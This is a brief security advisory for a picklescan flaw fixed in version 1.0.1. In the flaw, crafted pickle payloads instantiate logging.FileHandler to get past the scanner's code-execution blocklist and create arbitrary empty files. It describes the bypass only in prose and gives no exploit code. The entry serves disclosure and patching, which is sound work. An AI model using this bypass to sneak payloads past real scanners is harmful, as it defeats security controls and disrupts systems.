PT-2026-51155 · Picklescan · Picklescan
Ez-Lbz
·
Published
2026-06-20
·
Updated
2026-06-20
·
CVE-2026-56304
CVSS v3.1
6.5
Medium
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L |
Name of the Vulnerable Software and Affected Versions
picklescan versions prior to 1.0.1
Description
Unsafe pickle deserialization allows unauthenticated attackers to create arbitrary zero-byte files. This is achieved through the instantiation of the
logging.FileHandler class. By crafting malicious pickle payloads, attackers can bypass remote code execution (RCE) blocklists to create lock files or other filesystem artifacts, which may lead to application disruption or denial of service.Recommendations
Update to version 1.0.1.
Fix
Deserialization of Untrusted Data
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Picklescan